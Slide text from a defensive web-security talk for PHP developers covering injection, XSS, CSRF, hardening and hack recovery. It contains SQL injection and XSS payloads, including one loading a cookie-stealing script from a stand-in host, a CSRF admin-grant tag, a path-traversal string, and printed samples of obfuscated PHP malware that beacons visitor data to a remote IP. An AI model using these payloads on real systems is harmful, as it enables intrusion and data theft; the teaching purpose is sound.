With more and more sites falling victim to data theft, you've probably read the list of things (not) to do to write secure code. But what else should you do to make sure your code and the rest of your web stack is secure ? In this tutorial we'll go through the basic and more advanced techniques of securing your web and database servers, securing your backend PHP code and your frontend javascript code. We'll also look at how you can build code that detects and blocks intrusion attempts and a bunch of other tips and tricks to make sure your customer data stays secure.
2. Who am I ?
Wim Godden (@wimgtr)
Founder of Cu.be Solutions (http://cu.be)
Open Source developer since 1997
Developer of PHPCompatibility, OpenX, ...
Speaker at PHP and Open Source conferences
3. Who are you ?
Developers ?
System engineers ?
Network engineers ?
Ever had a hack ?
Through the code ?
Through the server ?
4. This talk
Based on 2-day training
Lots of links at the end → slides online
Code samples in PHP
→ no worries, works the same in other languages
5. My app is secure... I think
Basic stuff = known...
… or is it ?
Code is not enough
Code
Webserver
Database server
Operating system
Network
6. Disclaimer
Do not use these techniques to hack
Use the knowledge to prevent others from hacking you
7. Reasons for hackers to hack
Steal and sell your data
Use your infrastructure as a jumpstation to hack other servers
Send out lots of spam
Use your server in a botnet for DDOS attacks
Bring down your systems
…
10. Recognize this kind of code ?
<?
require("header.php");
$hostname="localhost";
$sqlusername="someuser";
$sqlpassword="somepass";
$dbName="somedb";
MYSQL_CONNECT($hostname,$sqlusername,$sqlpassword) OR DIE("Unable to connect to database.");
@mysql_select_db("$dbName") or die("Unable to select database.");
$fp=fopen("content/whatever.php","r");
while (!feof($fp))
$content.=fgets($fp,2);
$res=MYSQL_DB_QUERY("somedb","select * from whatever where id=" . $_GET['id']);
for ($cnt=0;$cnt<MYSQL_NUMROWS($res);$cnt++)
{
$lst.="<LI>".MYSQL_RESULT($res,$cnt,"text")."</LI>n";
}
$content=str_replace("<@textstring@>",$lst,$content);
print $content;
require("footer.php");
?>
11. SQL Injection (OWASP #1)
Over 15 years
Still #1 problem
Easy to exploit
Easy to automate (scan + exploit)
12. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' .
mysql_result($result, 0, 'email') . '>';
} else {
echo 'Nobody home';
}
select * from user where email='wim@cu.be'
E-mail : wim@cu.be
13. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' .
mysql_result($result, 0, 'email') . '>';
} else {
echo 'Nobody home';
}
select * from user where email='' OR '1'='1'
E-mail : ' OR '1'='1
14. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' .
mysql_result($result, 0, 'email') . '>';
} else {
echo 'Nobody home';
}
select * from user where '1'='1'
E-mail : ' OR '1'='1
15. Standard SQL injection example
<?php
$query = "select * from user where email='" . $_POST['email'] . "'";
$result = mysql_query($query);
if (mysql_errno() != 0) {
echo 'Hello to you, ' . mysql_result($result, 0, 'name') . ' <' .
mysql_result($result, 0, 'email') . '>';
} else {
echo 'Nobody home';
}
select * from user
E-mail : ' OR '1'='1
16. Hackers just want your data
select * from user where email='' OR '1'='1' limit 2, 1; --';
select * from user where email='' OR '1'='1' limit 3, 1; --';
select * from user where email='' OR '1'='1' limit 4, 1; --';
...
' OR '1'='1' limit 2, 1; –';E-mail :
17. SQL Injection – much more...
Much more than logging in as a user
SQL injection possible → wide range of dangers
18. Fixing SQL injection : attempt #1
Addslashes() ?
$query = mysql_query('select * from user where id=' . addslashes($_GET['id']));
www.hack.me/id=5%20and%20sleep(10)
select * from user where id=5 and sleep(10)
What if we hit that code 100 times simultaneously ?
MySQL max_connections reached → Server unavailable
22. Other injections
LDAP injection
Command injection (system, exec, ...)
Eval (waaaaaaaaaah !)
…
User input → Your application → External system
If you provide the data, it's your responsibility !
If you consume the data, it's your responsibility !
26. Ways to avoid session fixation/hijacking
session.use_trans_sid = 0
session.use_only_cookies = true
session.cookie_httponly = true
Change session on login using session_regenerate_id(true)
Do not share sessions between sites/subdomains
Do not accept sessions not generated by your code
Foreign session → remove the session cookie from the user
Regenerate session regularly using session_regenerate_id(true)
Use HTTPS
session.cookie_secure = true
All of the above help against session fixation AND session hijacking !
27. XSS – Cross Site Scripting
<?php
addMessage($_GET['id'], $_GET['message']);
echo 'Thank you for submitting your message : ' . $_GET['message'];
URL : /submitMessage
http://www.our-app.com/submitMessage?id=5&message=<script>alert('Fun eh ?')</script>
28. XSS – more advanced
http://www.our-app.com/submitMessage?id=5&message=Thanks, we will be in touch soon.<script
type="text/javascript" src="http://someplace.io/i-will-get-your-cookie.js"></script>
30. XSS : Non-persisted vs persistent
Previous examples were non-persistent : issue occurs once
Post code to exploitable bulletin board
→ Persistent
→ Can infect every user
→ If you stored it without filtering, you're responsible for escaping on output !
31. XSS : how to avoid
Filter input, escape output !
<?php
echo 'I just submitted this message : ' .
htmlentities($_GET['message'], ENT_QUOTES, 'UTF-8', false);
32. CSRF : Cross Site Request Forgery
www.our-app.com
1
Submit article
for review
2
Retrieve article
for review
3
Evil html or jsmakes call
4
Devil uses extra
privileges
Here's the article you were asking for.
<img src=”http://www.our-app.com/userSave.php?username=Devil&admin=1” />
33. CSRF : ways to avoid
Escape the output (where did we hear that before ?)
Add a field to forms with a random hash/token for verification upon submit
Check the referer header
→ Easy to fake
<form method="post" action="userSave.php">
<input name="id" type="hidden" value="5" />
<input name="token" type="hidden" value="a4gjogaihfs8ah4gisadhfgifdgfg" />
rest of the form
</form>
34. General rules – input validation
Assume all data you receive as input
contains a hack attempt !
That includes data from trusted users
→ over 90% of hacks are done by employees/partners/...
Filter on disallowed characters
Check validity of
Dates
Email addresses
URLs
etc.
Input validation is not browser-side code, it's server-side code
(you can ofcourse use browser-side code to make it look good)
35. General rules – validation or filtering ?
Validation :
Verify if the values fit a defined format
Examples :
expecting int, but received 7.8 → “error, 7.8 is not a valid integer”
expecting international phone number, but received “+32 3 844 71 89”
Filtering / sanitizing :
Enforce the defined format by converting to it
Examples :
expecting int, but received 7.8 → 8
expecting int, but received 'one' → 0
expecting international phone number, but received “+32 3 844 71 89” → “+3238447189”
Both have (dis)advantages
36. General rules – escaping output
Doing input validation → why do you need output escaping ?
What if the data originates from
a webservice
an XML feed
…
Always escape output !
37. Clickjacking
Do you want to
support
our cause ?
NoSure
Do you want to
delete all your
Facebook
friends ?
Yes No
FB button
<style>
iframe { /* iframe from facebook.com */
width:300px;
height:100px;
position:absolute;
top:0; left:0;
filter:alpha(opacity=0);
opacity:0;
}
</style>
39. Bad authentication / authorization layer
index.php
(checks cookie)
login.php
(sets cookie)
redirect
to login
main.php
redirect
to main
40. Bad authentication / authorization layer
index.php
(checks cookie)
login.php
(sets cookie)
redirect
to login
main.php
(doesn't check
cookie !)
redirect
to main
41. Bad authentication / authorization layer
Only hiding URLs on view, not restricting on action
/somewhere is visible on screen
/somewhere/admin is not visible, but is accessible
Allowing direct access to other user's data
/user/profile/id/311 is the user's profile
/user/profile/id/312 is also accessible and updateable
Allowing direct access to file downloads with guessable urls
/download/file/83291.pdf
Creating cookies :
loggedin=1
userid=312
admin=1
42. Protecting your web stack
Application language
Webserver
Database server
Mail server
Other servers
Firewalls
...
43. Protecting your web stack - PHP
Update to the latest version (7.1 = EOL)
Safe_mode = dead → use PHP-FPM or VMs
Register_globals = dead :-)
Suhosin patch → mostly for web hosting companies
Disable 'dangerous' PHP functions you don't need in php.ini
system
exec
passthru
'Eval' is not a function, so can not be disabled
44. Protecting your web stack – PHP code
If you allow uploads, restrict extensions. No .php, .phtml !
Don't show errors...
45. Protecting your web stack – PHP code
If you allow uploads, restrict extensions. No .php, .phtml !
Don't show errors...
...and don't show exceptions, but...
…log them ! And watch your logs ;-)
If you use filenames as parameters
download.php?filename=test.pdf
Make sure you don't allow ../../../../etc/passwd
Use basename() and pathinfo() to restrict
File extensions :
Use .php
Don't use .inc, .conf, .include, ...
46. Protecting your web stack – Passwords
Don't use MD5 or SHA1 → sha512, blowfish, …
Set a good password policy
Min 8 chars, min 1 number, min 1 uppercase char, …
NO maximum length
Try to avoid password hints
→ Email link is better for recovery
Don't create your own password hashing algorithm !
Use password_hash()
5.5+ : built-in
< 5.5 : ircmaxell/password-compat
47. Protecting your web stack – Webserver
Block direct access to upload directories
49. Protecting your web stack – Webserver
Block direct access to upload directories
Allow only access to port 80 and 443 (!)
Disable phpMyAdmin (VPN only if required)
On Apache don't :
AllowOverride All
Options Indexes
Avoid using .htaccess
Block access to .svn and .git
Block access to composer.lock, composer.json, …
(which should be outside your webroot normally)
53. Protecting your web stack – Database server
No access from the web required
Give it a private IP
Other websites on network ?
→ send traffic over SSL
54. Protecting your web stack
Use public/private key pairs for SSH, not passwords
Don't login as root
→ Use sudo for commands that really need it
Allow SSH access only from VPN
Running
Memcached ?
Gearman ?
… ?
→ Block external access
60. Lack of updates
Not updating system packages
Not updating frameworks and libraries
Not just main components
Doctrine
Bootstrap
Javascript libraries
etc.
Not updating webserver software
Not updating database server software
Recently :
Heartbleed (OpenSSL)
Shellshock (Bash)
Ghost (Glibc)
61. Protecting your web stack - firewalls
Separate or on-server
Default policy = deny all
Don't forget IPv6 !!!
62. Protect your backups
Should be encrypted with public/private key system
Private key should be stored in 2 separate locations
Backups should never be stored on same server
Backup server should pull backups
63. MySQL : use the binlog
Setup Master-Slave (even if you don’t have a Slave !)
Master creates binlog
Allows recovery to a specific second
Backup the binlogs for 7-10 days
MySQL backup : mysqldump with --opt --single-transaction
(preferably on slave to avoid locking users)
64. First action of a hacker
Make sure they don't lose the access they gained
Create new user → easy to detect
Install a custom backdoor
→ easy to detect with good IDS
Install a backdoor based on installed software
→ Example : start SSHD with different config on different port (remember firewall ?)
→ Harder to detect
→ Kill it... what happens ?
→ Probably restarts via cronjob
65. Using an Intrusion Detection System
Host-based Intrusion Detection System (HIDS)
OSSEC
Samhain
Network-based Intrusion Detection System (NIDS)
Snort
Sirucata
66. One IDS distro to rule them all
Security Onion
Based on Ubuntu
Contains all the IDS tools...
...and much more
67. What's the problem with public wifi ?
Traffic can be intercepted
Traffic hijacking / injection
Forcing site to use HTTPS fixes it right ?
What if user goes to some other HTTP site and I inject <img src=”http://yoursite.com/someurl”> ?
→ Session cookies are transmitted over HTTP
Use HSTS
HTTP Strict Transport Security
Tells browser to use only HTTPS connections
Strict-Transport-Security: max-age=expireTime [; includeSubDomains] [; preload]
Chrome 4+, FF 4+, IE 11+, Opera 12+, Safari 7+
68. You've been hacked ! Now what ? (1/4)
Take your application offline
→ Put up a maintenance page (on a different server)
Take the server off the public Internet
Change your SSH keys
Make a full backup
Check for cronjobs
Check access/error/... logs
(And give them to legal department)
Were any commits made from the server ?
→ Your server shouldn't be able to !
69. What a hack might look like
eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0
xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFf
OF8zXzEvY2F0YWxvZy9pbmNsdWRlcy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKSl7aW
5jbHVkZV9vbmNlKCcvaG9tZS9iaXJkc2FuZC9wdWJsaWNfaHRtbC90ZW1wL1VQU0Nob2ljZTFfOF8zXzEvY2F0YWxvZy9pbmNsdWRl
cy9sYW5ndWFnZXMvZW5nbGlzaC9tb2R1bGVzL3NoaXBwaW5nL3N0eWxlLmNzcy5waHAnKTtpZihmdW5jdGlvbl9leGlzdHMoJ2dtbC
cpJiYhZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXtmdW5jdGlvbiBnemRl
Y29kZSgkUjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4KXskUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCPW
9yZChzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwzLDEpKTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRG
ODg0NjM1RTQxPTEwOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9MDtpZigkUjZCNkU5RTQxKSsxO31pZigkUjZCNk
U5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjE2KXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxPXN0cnBvcygk
UjIwRkQ2NUU5Qzc0MDYwMzRGQURDNjgyRjA2NzMyODY4LGNocigwKSwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKS
sxO31pZigkUjZCNkU5OENERThCMzMwODdBMzNFNEQzQTQ5N0JEODZCJjIpeyRSNjAxNjlDRDFDNDdCN0E3QTg1QUI0NEY4ODQ2MzVF
NDErPTI7fSRSQzRBNUI1RTMxMEVENEMzMjNFMDRENzJBRkFFMzlGNTM9Z3ppbmZsYXRlKHN1YnN0cigkUjIwRk...'));
71. What a hack might look like
$GLOBALS['_226432454_']=Array();
function _1618533527($i)
{
return '91.196.216.64';
}
$ip=_1618533527(0);
$GLOBALS['_1203443956_'] = Array('urlencode');
function _1847265367($i)
{
$a=Array('http://','/btt.php?
ip=','REMOTE_ADDR','&host=','HTTP_HOST','&ua=','HTTP_USER_AGENT','&ref=','HTTP_REFERER');
return $a[$i];
}
$url = _1847265367(0) .$ip ._1847265367(1) .$_SERVER[_1847265367(2)] ._1847265367(3) .
$_SERVER[_1847265367(4)] ._1847265367(5) .$GLOBALS['_1203443956_'][0]($_SERVER[_1847265367(6)])
._1847265367(7) .$_SERVER[_1847265367(8)];
$GLOBALS['_399629645_']=Array('function_exists', 'curl_init', 'curl_setopt', 'curl_setopt',
'curl_setopt', 'curl_exec', 'curl_close', 'file_get_contents');
function _393632915($i)
{
return 'curl_version';
}
72. You've been hacked ! Now what ? (2/4)
Search system
preg_replace
base64_decode
eval
system
exec
passthru
Search system and database
script
iframe
73. You've been hacked ! Now what ? (3/4)
Find out how the hack happened ;-)
Write an apology to your customers
Finally :
Reinstall the OS (from scratch !)
Update all packages to the latest version
Don't reinstall code from backup !
Install source code from versioning system
Restore DB from previous backup (use binary log file)
74. Restoring your database to a specific point
Turn on binary log
Usually for master-slave replication
Useful for fast recovery
Make sure it can handle >24h of data
Make a daily database backup
Make a db dump to a file (mysqldump, …)
Warning : locking danger → do this on the slave !
Backup the db dump file
To recover :
Restore the db dump file
Replay binary log (mysqlbinlog …)
75. You've been hacked ! Now what ? (4/4)
Install IDS
Get an external security audit on the code
Get an external security audit on the system/network setup
Change user passwords
Relaunch
Cross your fingers
76. Takeaways
Think like a hacker
Can I steal data ? Can I DOS the site ?
Which techniques could I use to do it ?
Try it without looking at the code
Try it while looking at the code
Use SSL/HTTPS everywhere !
Block all traffic, then allow only what's needed
Sanitize/filter your input
Escape your output
Use an IDS
Never trust a hacked system
Prepare for GDPR
81. The software discussed (and more)
Protecting your mail server
SPF and DomainKeys : http://www.pardot.com/faqs/administration/adding-spf-domainkeys-dns/
DNS
Hijacking : http://www.gohacking.com/dns-hijacking/
Spoofing :
http://www.windowsecurity.com/articles-tutorials/authentication_and_encryption/Understanding-
Man-in-the-Middle-Attacks-ARP-Part2.html
IPv6 – don't forget to firewall it the same way :
https://www.sixxs.net/wiki/IPv6_Firewalling
Automatic scanning tools :
Nessus : http://www.tenable.com/products/nessus-vulnerability-scanner
Wapiti : http://wapiti.sourceforge.net/
Nexpose : http://www.rapid7.com/products/nexpose/
82. The software discussed (and more)
Slow HTTP DOS attacks :
https://www.acunetix.com/blog/articles/slow-http-dos-attacks-mitigate-apache-http-ser
ver/
IDS
PHP
PHPIDS : https://github.com/PHPIDS/PHPIDS
Exposé : https://github.com/enygma/expose
Host-based
OSSEC : www.ossec.net
Samhain : http://www.la-samhna.de/samhain/
AIDE : http://aide.sourceforge.net/
Network-based
Snort : https://www.snort.org/
Sirucata : http://suricata-ids.org/
All in one : Security Onion : http://blog.securityonion.net/
83. The software discussed (and more)
Penetration testing live CD :
Backtrack Linux : http://www.backtrack-linux.org/
Kali Linux : https://www.kali.org/
84. In case you're interested
This talk : 45min
Training : 2 days
1,5 days of interactive training (partly slides, partly hands-on)
Try out different security issues
Experiment on local virtualboxes and physical machines
0,5 day of auditing
Your code
Your servers
Your network
As a global team effort or in smaller teams
More details : https://techpath.eu
85. Next week
On stage : Derick Rethans, author of Xdebug 3 and PHP 7.4 release manager
Location : Zaventem
Date / time : 2019-12-11T19:00:00.00000+02:00
Find us on Meetup.com and RSVP please ;-)